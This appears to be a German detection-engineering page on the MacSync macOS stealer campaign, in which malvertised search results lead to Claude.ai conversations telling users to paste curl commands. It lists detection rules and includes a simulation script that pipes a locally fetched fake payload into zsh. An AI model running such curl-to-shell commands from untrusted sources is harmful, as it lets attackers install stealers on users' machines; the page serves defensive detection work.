Gefälschte Claude-Suchergebnisse führen macOS-Nutzer zu MacSync Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure missbrauchen Malvertising in Google-Suchergebnissen, um Benutzer zu legitimen Claude.ai-Konversationen weiterzuleiten, die Anweisungen zum Ausführen bösartiger curl Befehle enthalten. Die Angriffskette liefert MacSync, einen fortschrittlichen macOS-Stealer und RAT, der zum Exfiltrieren von Anmeldeinformationen, Keychain-Geheimnissen und Kryptowährungs-Wallet-Daten entwickelt wurde. Die Malware folgt einer komplexen Sechs-Phasen-Kill-Chain, die Ausführung im Speicher und Missbrauch von TCC-Berechtigungen beinhaltet.
Untersuchung
Huntress-Analysten untersuchten die Malvertising-Kampagne, nachdem ein Kunde durch eine gefälschte Claude-Installationsanleitung kompromittiert wurde. Forscher umgingen den Schutz der Angreifer und beschafften eine Malware-Probe direkt von der Infrastruktur des Gegners. Die Untersuchung deckte eine mehrstufige Ausführungskette auf, die einen zsh Loader, AppleScript-basierter Datendiebstahl und einen Mach-O-RAT umfasst, der zur Herstellung der Persistenz verwendet wird.
Minderung
Benutzer sollten vermeiden, nicht verifizierte Befehle im Terminal zu kopieren und auszuführen, selbst wenn die Anweisungen auf legitimen oder vertrauenswürdigen Domains erscheinen. Sicherheitsteams sollten auf verdächtige curl Aktivitäten und Base64-codierte Inhalte innerhalb von Shell-Prozessen achten. Tools wie BlockBlock und LuLu können auch helfen, macOS-Persistenzmechanismen und unautorisierte ausgehende Netzwerkverbindungen zu erkennen.
Reaktion
Wird MacSync-Aktivität erkannt, sollte das betroffene macOS-Gerät sofort isoliert werden, um weitere Datenexfiltration zu stoppen. Ermittler sollten die Shell-Historie und Endpunkt-Telemetrie auf unautorisierte curl or zsh Ausführungen überprüfen. Änderungen der TCC-Berechtigungen sollten ebenfalls untersucht werden, ebenso wie unautorisierte LaunchAgents und modifizierte Anwendungs-Binärdateien, besonders diejenigen, die mit Kryptowährungs-Wallets assoziiert sind.
Angriffsfluss
Erkennungen
Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)
Archiv wurde im temporären MacOS-Ordner erstellt (über file_event)
IOCs (SourceIP) zur Erkennung: Wie eine Google-Suche nach Claude zu MacSync führte
IOCs (DestinationIP) zur Erkennung: Wie eine Google-Suche nach Claude zu MacSync führte
Bösartiges Suchergebnis führt zu MacSync Infostealer [Webserver]
Mach-O RAT Command & Control-Verbindung über WebSockets [Windows-Netzwerkverbindung]
Erkennung der MacSync-Malvertising-Kampagne mit Curl und Zsh-Loader [Linux-Prozess-Erstellung]
Ausführung der Simulation
Voraussetzung: Die Telemetrie- & Basislinien-Überprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Gegnertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und das Narrativ MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffsnarrativ & Befehle: Der Angreifer zielt mit einem gefälschten Software-Update (Malvertising) auf den Benutzer ab. Sobald der Benutzer den im Terminal bereitgestellten Befehl ausführt,
curlwird ein bösartiges Skript abgerufen. Dieses Skript wird sofort inzsheingepiped. Das Skript enthält eine spezifische Zeichenkettedaemon_function, die verwendet wird, um bösartige Hintergrundprozesse zu verbergen. Die Erkennungsregel sucht speziell nach der Kombination voncurl,zsh, und demdaemon_functionString in der Kommandozeile, um diese spezifische Kampagne zu identifizieren. -
Regressionstest-Skript:
#!/bin/bash # Simulationsskript zur Validierung der Erkennung von MacSync-Malvertising. # Dieses simuliert einen Benutzer, der einen One-Liner ausführt, der ein Skript abruft und ausführt. echo "[+] MacSync-Simulation startet..." # Wir simulieren den Befehl, indem wir ein lokales "bösartiges" Skript erstellen # und dann das genaue Kommandozeilenmuster ausführen, nach dem die Regel sucht. echo "function daemon_function() { echo 'Exfiltrating data...'; }; daemon_function" > /tmp/fake_payload.sh chmod +x /tmp/fake_payload.sh # Dies ist das genaue Muster: curl + zsh + daemon_function # Wir verwenden eine Subshell, um das Piping-Verhalten zu simulieren echo "[+] Bösartige Kommandozeile wird ausgeführt..." curl -s http://localhost/fake_payload.sh | zsh -s daemon_function echo "[+] Simulationsbefehl ausgeführt." -
Bereinigungskommandos:
# Entfernen der simulierten Payload und temporären Dateien. rm /tmp/fake_payload.sh echo "[+] Bereinigung abgeschlossen."